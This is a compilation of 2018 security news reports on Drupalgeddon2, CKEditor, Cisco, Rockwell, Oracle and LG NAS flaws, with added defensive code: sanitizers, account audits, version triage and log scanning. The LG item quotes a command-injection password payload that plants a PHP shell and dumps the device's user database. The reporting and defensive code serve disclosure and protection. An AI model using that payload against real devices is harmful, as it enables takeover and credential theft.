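function deliver(reply, receiverOrigin, senderOrigin = TRUSTED_SENDER) {
  if (!reply.send) return null;
  if (reply.targetOrigin !== '*' && reply.targetOrigin !== receiverOrigin) return null;
  return parseAutoFillMessage({ origin: senderOrigin, data: reply.payload });
}
```

Note what these checks do not cover: an allowlisted site that is itself compromised still receives data (the gap Cable pointed out in the interim fix), and nothing here stops an allowlisted embedder from hiding the button, which is why the later fix added a visible prompt to the user before data is sent.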

While the vulnerability itself is not particularly sophisticated, the existence of such security holes can pose a serious problem to both a company and its customers, as demonstrated by the recent Cambridge Analytica scandal, in which the data of as many as 87 million Facebook users was harvested.

Cable has also reported vulnerabilities to Google, Yahoo, Uber, the U.S. Department of Defense (Hack the Air Force), and many other organizations.


Drupal 8 Updated to Patch Flaw in WYSIWYG Editor
20.4.2018 securityweek
Vulnerebility

Updates released on Wednesday for Drupal 8 patch a moderately critical cross-site scripting (XSS) vulnerability affecting a third-party JavaScript library.

The flaw impacts CKEditor, a WYSIWYG HTML editor included in the Drupal core. CKEditor exposes users to XSS attacks due to a flaw in the Enhanced Image (image2) plugin.

"The vulnerability stemmed from the fact that it was possible to execute XSS inside CKEditor using the <img> tag and specially crafted HTML," said CKEditor developers. "Please note that the default presets (Basic/Standard/Full) do not include this plugin, so you are only at risk if you made a custom build and enabled this plugin."

XSS flaws can typically be exploited by getting the targeted user to click on a specially crafted link, and they allow attackers to execute arbitrary script in the victim's browser, leading to session hijacking, data theft or phishing.
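The standard defence for markup produced by a rich-text editor is an attribute allowlist applied before the HTML is stored or rendered: keep only the attributes an image legitimately needs, drop event handlers, and accept only image-like URL schemes in src. The block below is an added example, not CKEditor's code or its 4.9.2 fix; the regex-based tag scanning (which assumes reasonably well-formed tags, a real sanitizer should work on a parsed DOM), the allowed attribute set and the accepted URL forms are assumptions.

```javascript
// Added example, not CKEditor's fix: an attribute allowlist for <img> tags.
// Assumes reasonably well-formed tags (no '>' inside attribute values); the
// allowed attribute set and SAFE_SRC forms are illustrative choices.

const IMG_ALLOWED_ATTRS = new Set(['src', 'alt', 'width', 'height', 'title']);
// http(s) URLs, site-relative paths, or base64 raster images only.
const SAFE_SRC = /^(https?:\/\/|\/(?!\/)|data:image\/(png|jpeg|gif|webp);base64,)/i;

// Split one tag's attribute string into [name, value] pairs. Handles
// name="v", name='v', name=v and bare name; names are lower-cased.
function parseAttrs(s) {
  const out = [];
  const re = /([^\s=\/"'<>]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+)))?/g;
  let m;
  while ((m = re.exec(s)) !== null) {
    out.push([m[1].toLowerCase(), m[2] ?? m[3] ?? m[4] ?? '']);
  }
  return out;
}

// Re-escape values before emitting them inside double-quoted attributes.
function escapeAttr(v) {
  return v.replace(/&/g, '&amp;').replace(/"/g, '&quot;').replace(/</g, '&lt;').replace(/>/g, '&gt;');
}

// Rebuild a single <img> from its attribute string, or return '' to drop it.
function sanitizeImgTag(attrString) {
  const kept = [];
  for (const [name, value] of parseAttrs(attrString)) {
    if (!IMG_ALLOWED_ATTRS.has(name)) continue;          // onerror=, style=, srcset=, ...
    if (name === 'src' && !SAFE_SRC.test(value.trim())) return ''; // javascript:, data:text/html, ...
    if ((name === 'width' || name === 'height') && !/^\d{1,4}$/.test(value)) continue;
    kept.push(`${name}="${escapeAttr(value)}"`);
  }
  if (!kept.some((a) => a.startsWith('src='))) return '';  // an image without a usable src is noise
  return `<img ${kept.join(' ')}>`;
}

// Apply the allowlist to every <img> tag in a fragment of HTML.
function sanitizeImages(html) {
  return html.replace(/<img\b([^>]*)>/gi, (_, attrs) => sanitizeImgTag(attrs));
}
```

Allowlisting attributes, rather than blocklisting known-bad ones, is what keeps this robust against the next handler attribute or scheme variant; the same approach extends to other tags the editor permits.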

The security hole, discovered by Kyaw Min Thein, affects CKEditor versions 4.5.11 through 4.9.1, and it has been fixed with the release of version 4.9.2. The patched version of CKEditor has been included in Drupal 8.5.2 and 8.4.7.

"The Drupal 7.x CKEditor contributed module is not affected if you are running CKEditor module 7.x-1.18 and using CKEditor from the CDN, since it currently uses a version of the CKEditor library that is not vulnerable," Drupal developers explained. "If you installed CKEditor in Drupal 7 using another method (for example with the WYSIWYG module or the CKEditor module with CKEditor locally) and you’re using a version of CKEditor from 4.5.11 up to 4.9.1, update the third-party JavaScript library by downloading CKEditor 4.9.2 from CKEditor's site."

This is the second Drupal security update in recent weeks. The previous update was released in late March and it addressed CVE-2018-7600, a highly critical remote code execution vulnerability that allows attackers to take control of impacted websites.

Dubbed Drupalgeddon2, the flaw has been exploited in the wild to deliver backdoors, cryptocurrency miners, and other types of malware. The first attempts to exploit the vulnerability were spotted in mid-April, shortly after technical details and proof-of-concept (PoC) code were made public.


Cisco Patches Critical Flaws in WebEx, UCS Director
20.4.2018 securityweek
Vulnerebility

Cisco informed customers on Wednesday that it has patched critical vulnerabilities in WebEx and UCS Director, along with nine high severity flaws in StarOS, IOS XR, Firepower and ASA products.

The WebEx vulnerability, tracked as CVE-2018-0112, is interesting because it allows a remote attacker to execute arbitrary code on a targeted user’s system by sending them a specially crafted Flash (.swf) file via the WebEx client’s file sharing capabilities during a meeting.

The flaw, discovered by Alexandros Zacharis of the European Union Agency for Network and Information Security (ENISA), affects WebEx Business Suite clients, WebEx Meetings, and WebEx Meetings Server. Cisco has released software updates that patch the vulnerability.

The Cisco Unified Computing System (UCS) Director product is affected by an information disclosure issue that allows an authenticated attacker to remotely access information on virtual machines in the end-user portal and perform any permitted operations. The issue, identified as CVE-2018-0238, was discovered by Cisco itself and patches are available.

Of the 30 advisories published by Cisco on Wednesday, nine describe high severity flaws, 18 are for medium severity issues, and one is informational.

The high severity vulnerabilities include denial-of-service (DoS) flaws in StarOS, IOS XR software, Firepower Detection Engine and 2100 series appliances, and several Adaptive Security Appliance (ASA) products; a session fixation issue affecting ASA, AnyConnect Secure Mobility, and Firepower Threat Defense (FTD); and an SSL certificate verification bypass bug affecting ASA.

According to Cisco, none of the vulnerabilities disclosed this week have been exploited in the wild. However, it’s important for Cisco customers to patch serious flaws as it’s not uncommon for malicious actors to exploit them in their operations.

Cisco has recently warned customers that the risk of exploitation for an IOS Smart Install vulnerability is high. The vulnerability, CVE-2018-0171, was disclosed recently and a proof-of-concept (PoC) exploit is available.

While this particular flaw has yet to be exploited in attacks, the risk is high because Smart Install, along with other Cisco protocols, has already been abused in malicious campaigns, including ones conducted by state-sponsored threat actors.


Experts are observing Drupalgeddon2 (CVE-2018-7600) attacks in the wild
20.4.2018 securityaffairs
Vulnerebility

After the publication of a working Proof-Of-Concept for Drupalgeddon2 on GitHub experts started observing attackers using it to deliver backdoors and crypto miners.
At the end of March, the Drupal Security Team confirmed that a “highly critical” vulnerability (dubbed Drupalgeddon2), tracked as CVE-2018-7600, was affecting Drupal 7 and 8 core and announced the availability of security updates on March 28th.

The vulnerability was discovered by Drupal developer Jasper Mattsson.

Drupal 8.3.x and 8.4.x are no longer supported, but due to the severity of the flaw the Drupal Security Team decided to address it with specific security updates; experts dubbed it Drupalgeddon2.

Drupal development team released the security update in time to address CVE-2018-7600.

A week after the release of the security update, experts at security firm Check Point, together with Drupal experts at Dofinity, analyzed the CMS to understand the Drupalgeddon2 vulnerability and published a technical report on the flaw.

After the publication of the report, the expert Vitalii Rudnykh shared a working Proof-Of-Concept for Drupalgeddon2 on GitHub for “educational or information purposes.”

Immediately after the disclosure of the PoC, security experts started observing bad actors attempting to exploit the flaw.

Over the weekend, several security firms observed threat actors exploiting the flaw to install malware, mainly cryptocurrency miners, on vulnerable websites.

The experts at the SANS Internet Storm Center reported several attacks delivering a cryptocurrency miner, a PHP backdoor, and an IRC bot written in Perl.

“Pretty much as soon as the exploit became publicly available, our honeypots started seeing attacks that used the exploit.” reads the analysis published by the SANS.
“Ever since then, we are seeing waves of exploit attempts hitting our honeypots.”

A thread on the SANS ISC InfoSec forums confirms that attackers are exploiting the Drupalgeddon2 flaw to install the XMRig Monero miner. Attackers also drop and execute other payloads, including a script that kills competing miners on the infected system.

According to the analysis published by experts at security firm Volexity, threat actors are exploiting the Drupalgeddon2 flaw to deliver malicious scripts, cryptocurrency miners and backdoors.

The experts linked one of the observed campaigns delivering XMRig to a cybercriminal gang that exploited the CVE-2017-10271 vulnerability in Oracle WebLogic servers to deliver cryptocurrency miners in late 2017.

According to security experts at Imperva, 90% of the Drupalgeddon2 attacks are scanning activity, 3% are backdoor infection attempts, and 2% are attempts to drop cryptocurrency miners on the vulnerable systems.

“To this point, we have seen 90% of the attack attempts are scanners, 3% are backdoor infection attempts, and 2% are attempts to run crypto miners on the targets.” states the analysis published Imperva.

“Also, most of the attacks originated from the US (53%) and China (45%).”


While experts expect the number of attacks to keep growing in the coming weeks, site admins must update their CMS to Drupal 7.58 or Drupal 8.5.1.


Hacking Cisco WebEx with a malicious Flash file. Patch it now!
20.4.2018 securityaffairs
Vulnerebility

Cisco has issued a critical patch to address a remote code execution vulnerability in its WebEx software; apply it now.
Cisco has issued a critical patch to fix a serious vulnerability (CVE-2018-0112) in its WebEx software that could be exploited by remote attackers to execute arbitrary code on target machines via weaponized Flash files.

The vulnerability affects both the client and the server versions of WebEx Business Suite and WebEx Meetings. Cisco urges users to update their software.

“A vulnerability in Cisco WebEx Business Suite clients, Cisco WebEx Meetings, and Cisco WebEx Meetings Server could allow an authenticated, remote attacker to execute arbitrary code on a targeted system.” reads the security advisory published by Cisco.

“The vulnerability is due to insufficient input validation by the Cisco WebEx clients. An attacker could exploit this vulnerability by providing meeting attendees with a malicious Flash (.swf) file via the file-sharing capabilities of the client. Exploitation of this vulnerability could allow arbitrary code execution on the system of a targeted user.”

The flaw has received a CVSS score of 9.0 and was rated as a ‘critical’ severity issue by Cisco.


The vulnerability was reported by ENISA security expert Alexandros Zacharis; it is caused by insufficient input validation in the Cisco WebEx clients.

Zacharis found that an attacker could share a malicious Flash file (.swf) with a room full of attendees through the file-sharing feature and then trigger the flaw to execute arbitrary code on their systems.

Cisco has already released software updates that fix the flaw and confirmed that it is not aware of any attacks exploiting the vulnerability in the wild.

Cisco added that there is currently no workaround for the problem.

WebEx Business Suite software should be updated to versions T32.10 and T31.23.2, WebEx Meetings client software to T32.10, and WebEx Meetings Server to 2.8 MR2.

To determine whether a Cisco WebEx meeting application is running a vulnerable build of the WebEx client, users can log in to their Cisco WebEx meeting site and go to the Support > Downloads section.


Rockwell Automation Allen-Bradley Stratix and ArmorStratix switches are exposed to hack due to Cisco IOS flaws
20.4.2018 securityaffairs
Vulnerebility

Rockwell Automation is warning that its Allen-Bradley Stratix and ArmorStratix industrial switches are exposed to hack due to security vulnerabilities in Cisco IOS.
According to Rockwell Automation, eight flaws recently discovered in Cisco IOS affect its products, which are used in many sectors, including critical manufacturing and energy.

The list of flaws includes improper input validation, resource management errors, 7PK security-feature errors, improper restriction of operations within the bounds of a memory buffer, and use of an externally-controlled format string.

“Successful exploitation of these vulnerabilities could result in loss of availability, confidentiality, and/or integrity caused by memory exhaustion, module restart, information corruption, and/or information exposure.” reads the security advisory published by the US ICS-CERT.

Affected models are Stratix 5400, 5410, 5700, 8000 and ArmorStratix 5700 switches running firmware version 15.2(6)E0a and earlier.


The most critical vulnerability is CVE-2018-0171, a flaw in the Smart Install feature of Cisco IOS Software and Cisco IOS XE Software that could be exploited by an unauthenticated, remote attacker to cause a reload of a vulnerable device or to execute arbitrary code on it.

A couple of weeks ago, the hacking crew “JHT” launched a campaign exploiting CVE-2018-0171 against network infrastructure in Russia and Iran.

Rockwell has released firmware version 15.2(6)E1 to address the vulnerabilities in its switches.

Rockwell Automation also provided mitigations to apply in addition to the firmware upgrade:

Cisco has released new Snort rules at https://www.cisco.com/web/software/286271056/117258/sf-rules-2018-03-29-new.html to help address the following vulnerabilities:

CVE-2018-0171 – Snort Rule 46096 and 46097
CVE-2018-0156 – Snort Rule 41725
CVE-2018-0174 – Snort Rule 46120
CVE-2018-0172 – Snort Rule 46104
CVE-2018-0173 – Snort Rule 46119
CVE-2018-0158 – Snort Rule 46110


A flaw could allow easy hack of LG Network-attached storage devices
19.4.2018 securityweek 
Vulnerebility

Network-attached storage devices manufactured by LG Electronics are affected by a critical remote code execution vulnerability that could be exploited by attackers to gain full control of the devices.
Experts at security firm VPN Mentor found a pre-auth remote command injection vulnerability that affects the majority of LG NAS device models.

“we found a way to hack into the system using a pre-authenticated remote command injection vulnerability, which can then allow us to do virtually everything including access the data and tamper with the user data and content.” states the blog post published by VPN Mentor.

“The vulnerability is a pre-auth remote command injection vulnerability found in the majority of LG NAS devices.”


The flaw stems from improper validation of the “password” parameter of the remote-management login page, which means a remote attacker can pass arbitrary system commands through this field.

“As we show in the video, you cannot simply log in with any random username and password. However, there lies a command injection vulnerability in the “password” parameter (you have to use an interceptor like burp). We can simply trigger this bug by adding to it.” continues the analysis.

“To add a new user, we can simply write a persistent shell called c.php by using:

;echo “” > /tmp/x2;sudo mv /tmp/x2 /var/www/c.php

Entering it as a password exploits the vulnerability.

Then, by passing the following command, we can “dump” the users:

echo “.dump user” | sqlite3 /etc/nas/db/share.db"

The experts explained that it is quite simple to dump all the database data and add a new user. They also noticed that LG stores passwords as MD5 hashes, which means they can be easily cracked.

Below is a video PoC showing how to exploit the vulnerability to establish a shell on a vulnerable network-attached storage device and use it to execute commands.

LG has not yet released a security update to address the flaw; if you use LG NAS devices, do not expose them to the Internet and protect them with a firewall that allows connections only from authorized IPs.

Users are also advised to periodically review all registered usernames and passwords on their devices to detect any anomaly, such as an account they did not create.
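The advice above, checking the registered accounts for anomalies, can be turned into a repeatable audit. The following is an added example, not VPN Mentor's or LG's code. It reads the `user` table the write-up dumps from `/etc/nas/db/share.db`, compares it against a saved baseline to surface added accounts and changed hashes, and shows why unsalted MD5 is easy to crack by checking every hash against a small word list. The column names (`name`, `pwd`), the word list and the in-memory database rows are assumptions constructed for the demo.

```python
import hashlib
import sqlite3

# Added example, not VPN Mentor's or LG's code. The write-up shows the accounts
# live in /etc/nas/db/share.db, table "user", with MD5 password hashes. The
# column names (name, pwd) and the rows below are ASSUMED for the demo.

WEAK_WORDLIST = ["admin", "password", "123456", "lg", "nas1234"]


def md5hex(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


def load_users(conn) -> dict:
    """{username: md5hex} from the user table."""
    return {name: pwd for name, pwd in conn.execute("SELECT name, pwd FROM user")}


def new_accounts(baseline: dict, current: dict) -> list:
    """Accounts present now that were not in the saved baseline: the footprint
    an attacker leaves after adding a user through the injection."""
    return sorted(set(current) - set(baseline))


def changed_hashes(baseline: dict, current: dict) -> list:
    """Existing accounts whose password hash changed since the baseline."""
    return sorted(u for u in baseline if u in current and current[u] != baseline[u])


def weak_passwords(users: dict, wordlist=WEAK_WORDLIST) -> dict:
    """Unsalted MD5: one hash per candidate word breaks every account that uses
    it, which is why the write-up calls these hashes easy to crack."""
    table = {md5hex(w): w for w in wordlist}
    return {u: table[h] for u, h in users.items() if h in table}


def audit(baseline: dict, conn) -> dict:
    users = load_users(conn)
    return {
        "new_accounts": new_accounts(baseline, users),
        "changed_hashes": changed_hashes(baseline, users),
        "weak_passwords": weak_passwords(users),
    }


def demo_db():
    """Constructed in-memory stand-in for share.db."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user (name TEXT PRIMARY KEY, pwd TEXT)")
    conn.executemany("INSERT INTO user VALUES (?, ?)", [
        ("admin", md5hex("nas1234")),
        ("alice", md5hex("S3cur3!Passphrase")),
        ("support", md5hex("password")),   # account the baseline never saw
    ])
    return conn


def demo_baseline() -> dict:
    """Snapshot taken before the 'support' account appeared and alice's hash changed."""
    return {"admin": md5hex("nas1234"), "alice": md5hex("old-passphrase")}


if __name__ == "__main__":
    print(audit(demo_baseline(), demo_db()))
```

On a real device the same `SELECT` runs against `sqlite3.connect("/etc/nas/db/share.db")` and the baseline is persisted (for example as JSON) after the first clean run; anything in `new_accounts` or `changed_hashes` that the owner did not do is the signal to investigate.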

A few weeks ago, experts at VPN Mentor disclosed several issues in popular VPN services.


Rockwell Automation Switches Exposed to Attacks by Cisco IOS Flaws
18.4.2018 securityweek 
Vulnerebility

Rockwell Automation informed customers this week that its Allen-Bradley Stratix and ArmorStratix industrial switches are exposed to remote attacks due to vulnerabilities in Cisco’s IOS software.

Allen-Bradley Stratix and ArmorStratix switches, which are used in the critical manufacturing, energy and other sectors, rely on Cisco’s IOS software for secure integration with enterprise networks. Rockwell Automation has determined that eight flaws discovered recently in Cisco IOS also affect its own products.

According to Rockwell and ICS-CERT, Stratix 5400, 5410, 5700, 8000 and ArmorStratix 5700 switches running firmware version 15.2(6)E0a and earlier are impacted by critical and high severity vulnerabilities that can be exploited remotely and without authentication for denial-of-service (DoS) attacks and arbitrary code execution.

The issues include CVE-2018-0171, a critical remote code execution flaw in the Smart Install feature that can be exploited to take complete control of vulnerable devices. The Smart Install protocol has been abused in many attacks over the past years, including by state-sponsored threat groups, and Cisco has warned that malicious actors may start exploiting CVE-2018-0171 as well.

Rockwell has released firmware version 15.2(6)E1 to address the vulnerabilities in the aforementioned switches.

The vendor also informed organizations using Allen-Bradley Stratix 5900 Services Routers with firmware version 15.6.3M1 and earlier that four of the Cisco IOS vulnerabilities impact these devices.

Rockwell has not released any firmware updates for this device and instead advised users to implement mitigations.

The company and ICS-CERT have also published advisories describing the impact of the eight Cisco IOS flaws on Allen-Bradley Stratix 8300 Industrial Managed Ethernet Switches with firmware versions 15.2(4a)EA5 and earlier. Mitigations have been made available for these switches as well.
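The advisories in this article and in the securityaffairs piece above state affected firmware as "version X and earlier" per model, with a fix only for some models. The following is an added example, not Rockwell's or Cisco's tooling: it parses the IOS version strings the advisories use (`15.2(6)E0a`, `15.2(4a)EA5`, and the `15.6.3M1` form quoted for the Stratix 5900), compares them within a release train, and triages an inventory into affected, patched and unknown. The inventory rows are constructed; the model-to-version table is taken from the text above.

```python
import re

# Added example, not Rockwell's or Cisco's tooling: turns the advisories'
# "version X and earlier" statements into a check over an asset inventory.
# The inventory rows are constructed.

# Matches 15.2(6)E0a, 15.2(4a)EA5 and the 15.6.3M1 form used for the Stratix 5900.
_VER_RE = re.compile(
    r"^(?P<major>\d+)\.(?P<minor>\d+)[.(](?P<maint>\d+)(?P<maint_l>[a-z]?)\)?"
    r"(?P<train>[A-Z]+)(?P<rebuild>\d+)(?P<rebuild_l>[a-z]?)$"
)

# model -> (last affected version, fixed version or None when only mitigations exist)
ADVISORIES = {
    "Stratix 5400": ("15.2(6)E0a", "15.2(6)E1"),
    "Stratix 5410": ("15.2(6)E0a", "15.2(6)E1"),
    "Stratix 5700": ("15.2(6)E0a", "15.2(6)E1"),
    "Stratix 8000": ("15.2(6)E0a", "15.2(6)E1"),
    "ArmorStratix 5700": ("15.2(6)E0a", "15.2(6)E1"),
    "Stratix 5900": ("15.6.3M1", None),
    "Stratix 8300": ("15.2(4a)EA5", None),
}


def parse_ios_version(s: str) -> tuple:
    """Comparable tuple; a missing letter suffix sorts before 'a' ('' < 'a'),
    so 15.2(4)EA5 is earlier than 15.2(4a)EA5."""
    m = _VER_RE.match(s.strip())
    if not m:
        raise ValueError("unrecognised IOS version: %r" % s)
    g = m.groupdict()
    return (int(g["major"]), int(g["minor"]), int(g["maint"]), g["maint_l"],
            g["train"], int(g["rebuild"]), g["rebuild_l"])


def at_or_below(version: str, ceiling: str):
    """True/False within the same release train; None if the trains differ,
    because the advisory says nothing about other trains."""
    v, c = parse_ios_version(version), parse_ios_version(ceiling)
    if v[4] != c[4]:
        return None
    return v <= c


def triage(inventory: list) -> list:
    out = []
    for dev in inventory:
        adv = ADVISORIES.get(dev["model"])
        if adv is None:
            out.append(dict(dev, status="not listed", action="none"))
            continue
        ceiling, fixed = adv
        verdict = at_or_below(dev["version"], ceiling)
        if verdict is None:
            status, action = "unknown", "different train than advisory; check with vendor"
        elif verdict:
            status = "affected"
            action = ("upgrade to " + fixed) if fixed else "apply Rockwell mitigations (no firmware fix)"
        else:
            status, action = "patched", "none"
        out.append(dict(dev, status=status, action=action))
    return out


INVENTORY = [  # constructed
    {"host": "sw-cell1", "model": "Stratix 5700", "version": "15.2(6)E0a"},
    {"host": "sw-cell2", "model": "Stratix 5700", "version": "15.2(6)E1"},
    {"host": "sw-ring", "model": "Stratix 8300", "version": "15.2(4)EA5"},
    {"host": "rtr-site", "model": "Stratix 5900", "version": "15.6.3M1"},
    {"host": "sw-old", "model": "Stratix 8000", "version": "15.2(4a)EA5"},
]

if __name__ == "__main__":
    for row in triage(INVENTORY):
        print(row["host"], row["model"], row["version"], row["status"], "->", row["action"])
```

The `unknown` outcome is deliberate: a version from a different train than the one the advisory names cannot be ordered against it, and silently treating it as patched is the mistake an inventory script must not make.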


Oracle Patches 254 Flaws With April 2018 Update
18.4.2018 securityweek 
Vulnerebility

Oracle’s Critical Patch Update (CPU) for April 2018 contains 254 new security fixes, 153 of which address vulnerabilities in business-critical applications.

A total of 19 products received security updates in this CPU, including E-Business Suite, Fusion Middleware, Financial Services Applications, Java SE, MySQL, PeopleSoft, Retail Applications, and Sun Systems Products Suite. Nearly half of the bugs are remotely exploitable.

Forty-two of the security holes addressed this month were assessed with a Critical severity rating, with the most severe of them featuring a CVSS score of 9.8. Affected products include Fusion Middleware, Financial Services, PeopleSoft, EBS, and Retail Applications.

Fusion Middleware received 39 patches, the largest number an Oracle product received this month. Thirty of the vulnerabilities may be remotely exploitable without authentication, the software giant explains in its advisory.

Next in line comes Financial Services Applications, with 36 vulnerabilities patched (18 of which may be remotely exploitable without authentication), followed by MySQL at 33 flaws (2 remotely exploitable) and Retail Applications at 31 bugs (27 remotely exploitable).

Oracle also released patches for Java SE (14 vulnerabilities – 12 remotely exploitable without authentication), Sun Systems Products Suite (14 issues – 3 remotely exploitable), Hospitality Applications (13 – 4), Virtualization (13 – 3), E-Business Suite (12 – 11), PeopleSoft (12 – 8), and Enterprise Manager Products Suite (10 – 8).

Other affected products include Communications Applications (9 vulnerabilities, 6 of which may be exploited remotely), Supply Chain Products Suite (5 – 3), Construction and Engineering Suite (4 – 2), JD Edwards Products (3 – 3), Siebel CRM (2 – 1), Database Server (2 – 0), Support Tools (1 – 0), and Utilities Applications (1 – 1).

Overall, 153 of the patches Oracle released this month target vulnerabilities affecting crucial business applications: PeopleSoft, E-Business Suite, Fusion Middleware, Retail, JD Edwards, Siebel CRM, Financial Services, Hospitality Applications, and Supply Chain.

Around 69% of the issues may be exploited remotely without entering credentials, ERPScan, which specializes in securing Oracle and SAP applications, notes. The firm also points out that Oracle has 110,000 application customers from various industries, which “makes it of the utmost importance to apply the released security patches.”

One of the most critical vulnerabilities addressed this month is CVE-2018-7489, which features a CVSS Base Score of 9.8. The issue allows an unauthenticated attacker with network access to take over the vulnerable component.

The vulnerability impacts multiple components of Oracle Financial Services Applications including Risk Measurement and Management, Hedge Management and IFRS Valuations, and Analytical Applications Infrastructure.

Another critical issue resolved in this Oracle CPU is CVE-2018-2628 (CVSS Base Score: 9.8), which impacts the WebLogic Server component of Fusion Middleware and can be exploited by an attacker with network access via the T3 transport protocol.

Other critical issues include CVE-2017-5645 (CVSS Base Score: 9.8), impacting the JD Edwards World Security component of JD Edwards Products, and CVE-2017-5645 (CVSS Base Score: 9.8), impacting the Retail Order Management System component of Retail Applications. Attackers successfully exploiting the bugs could gain full control over the impacted components.


Experts warn threat actors are scanning the web for Drupal installs vulnerable to Drupalgeddon2
14.4.2018 securityaffairs
Vulnerebility

After the publication of a working Proof-Of-Concept for Drupalgeddon2 on GitHub for “educational or information purposes,” experts started observing bad actors attempting to exploit the flaw.
At the end of March, the Drupal Security Team confirmed that a “highly critical” vulnerability (dubbed Drupalgeddon2), tracked as CVE-2018-7600, was affecting Drupal 7 and 8 core and announced the availability of security updates on March 28th.

The vulnerability was discovered by Drupal developer Jasper Mattsson.

Drupal 8.3.x and 8.4.x are no longer supported, but due to the severity of the flaw the Drupal Security Team decided to address it with specific security updates; experts dubbed it Drupalgeddon2.

Drupal development team released the security update in time to address CVE-2018-7600.


A week after the release of the security update, a proof-of-concept (PoC) exploit was publicly disclosed.

The experts at security firm Check Point, together with Drupal experts at Dofinity, analyzed the CMS to understand the Drupalgeddon2 vulnerability and published a technical report on the flaw.

“In brief, Drupal had insufficient input sanitation on Form API (FAPI) AJAX requests. As a result, this enabled an attacker to potentially inject a malicious payload into the internal form structure. This would have caused Drupal to execute it without user authentication.” reads the analysis.

“By exploiting this vulnerability an attacker would have been able to carry out a full site takeover of any Drupal customer.”

After the publication of the report, the expert Vitalii Rudnykh shared a working Proof-Of-Concept for Drupalgeddon2 on GitHub for “educational or information purposes.”

Immediately after the disclosure of the PoC, security experts started observing bad actors attempting to exploit the flaw.

Experts at Sucuri confirmed that they are seeing attempts to exploit the Drupal RCE (CVE-2018-7600) in the wild; below is the tweet published by Sucuri founder and CTO Daniel Cid.

Daniel Cid (@danielcid), 12:15 AM - Apr 13, 2018:

“We are seeing attempts for the Drupal RCE (CVE-2018-7600) in the wild now: https://www.drupal.org/sa-core-2018-002

Expect that to grow with the new exploits being shared publicly: https://github.com/a2u/CVE-2018-7600/blob/master/exploit.py

Also, good read from CheckPoint explaining it: https://research.checkpoint.com/uncovering-drupalgeddon-2/

Patch now!”
According to researchers at the SANS Institute's Internet Storm Center, threat actors are currently scanning the web for vulnerable servers using simple commands such as echo, phpinfo, whoami, and touch.

“The payload pings a host where the hostname of the target is prefixed to the hostname to be pinged. This is sort of interesting as mu6fea[.]ceye[.]io is a wildcard DNS entry, and *.mu6fea[.]ceye[.]io appears to resolve to 118.192.48.48 right now. So the detection of who is “pinging” is made most likely via DNS.” states the SANS analysis.

Experts have no doubt that hackers will soon start exploiting the flaw to compromise vulnerable websites in the wild.


Hackers Start Exploiting Drupalgeddon2 Vulnerability
14.4.2018 securityweek
Vulnerebility

Attempts to exploit a recently patched vulnerability in the Drupal content management system (CMS) were spotted by researchers shortly after someone published a proof-of-concept (PoC) exploit.

In late March, Drupal developers rolled out an update to address CVE-2018-7600, a highly critical remote code execution flaw that can be exploited to take full control of a site. The security hole affects Drupal 6, 7 and 8, and patches have been released for each of the impacted versions; Drupal 6 has not been supported since February 2016, but a patch was still created.


Experts warned at the time that exploitation of the vulnerability, dubbed Drupalgeddon2, was imminent. However, it took roughly two weeks for a proof-of-concept (PoC) exploit to become publicly available.

Researchers at Check Point and Drupal experts at Dofinity worked together to uncover the vulnerability and on Thursday they published a detailed technical analysis.

“In brief, Drupal had insufficient input sanitation on Form API (FAPI) AJAX requests,” they explained in a post on the Check Point blog. “As a result, this enabled an attacker to potentially inject a malicious payload into the internal form structure. This would have caused Drupal to execute it without user authentication. By exploiting this vulnerability an attacker would have been able to carry out a full site takeover of any Drupal customer.”

Shortly after Check Point and Dofinity published their analysis, Vitalii Rudnykh published a PoC on GitHub for “educational or information purposes,” which others confirmed to be functional. Once the PoC was made public, Sucuri and the SANS Internet Storm Center started seeing attempts to exploit Drupalgeddon2.

At the time of writing, there are no reports of websites being hacked via CVE-2018-7600. Attackers are apparently scanning the web in search for vulnerable servers. The payloads spotted by SANS researchers use simple commands such as echo, phpinfo, whoami and touch.
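The Form API injection Check Point describes and the probe commands SANS observed translate directly into a log check. The following is an added example (not Drupal's, Check Point's or SANS's code) that applies the rule Drupal's own fix introduced, dropping any request key that begins with `#`, to web-server access-log lines, and reports which of the probe commands named above appear in the request. It also shows the same rule as a server-side filter over parsed parameters. The log lines are constructed; `element_parents` is the real Form API AJAX query parameter, while the specific `#` property names in the sample follow the shape of the public PoC rather than anything stated in the article.

```python
import re
from typing import Optional
from urllib.parse import parse_qsl

# Drupal's fix for CVE-2018-7600 added a request sanitizer that drops any input
# key beginning with '#', because the Form API treats such keys as render-array
# instructions rather than user data. This scanner applies the same rule to
# web-server access-log lines so probes show up in the log pipeline.
# Added example, not Drupal's or SANS's code; the log lines are constructed.

# Combined/common log format: client IP, request line, status code.
_LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]*\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Bracketed segments of a PHP-style nested key: mail[#post_render][] -> ['#post_render', '']
_SEGMENT_RE = re.compile(r'\[([^\]]*)\]')
# Commands the SANS ISC saw in the first scanning waves, plus the ping callback.
_PROBE_CMDS = ("echo", "phpinfo", "whoami", "touch", "ping")


def key_has_hash_segment(key: str) -> bool:
    """True if the top-level name or any [segment] of the key starts with '#'."""
    segments = [key.split('[', 1)[0]] + _SEGMENT_RE.findall(key)
    return any(seg.startswith('#') for seg in segments)


def hash_keys(query: str) -> list:
    """Keys in a URL-encoded query/body that the Drupal sanitizer would strip."""
    return [k for k, _ in parse_qsl(query, keep_blank_values=True)
            if key_has_hash_segment(k)]


def strip_hash_keys(pairs: list) -> list:
    """Server-side hardening: the same rule applied to parsed (key, value) pairs."""
    return [(k, v) for k, v in pairs if not key_has_hash_segment(k)]


def classify_request(target: str, body: str = "") -> Optional[dict]:
    """Return indicators for one request, or None if it looks benign."""
    path, _, query = target.partition('?')
    pairs = (parse_qsl(query, keep_blank_values=True)
             + parse_qsl(body, keep_blank_values=True))
    keys = [k for k, _ in pairs if key_has_hash_segment(k)]
    # element_parents is the Form API AJAX parameter naming a path into the
    # form structure; a '#' inside it points at a render property, not a field.
    el_parents = [v for k, v in pairs if k == 'element_parents' and '#' in v]
    if not keys and not el_parents:
        return None
    values = ' '.join(v for _, v in pairs)
    cmds = sorted(c for c in _PROBE_CMDS if re.search(r'\b%s\b' % c, values))
    return {'path': path, 'hash_keys': keys,
            'element_parents': el_parents, 'commands': cmds}


def scan_log(text: str) -> list:
    """Run classify_request over every parseable line. POST bodies are not in
    access logs, so body-only payloads need a WAF or application log."""
    findings = []
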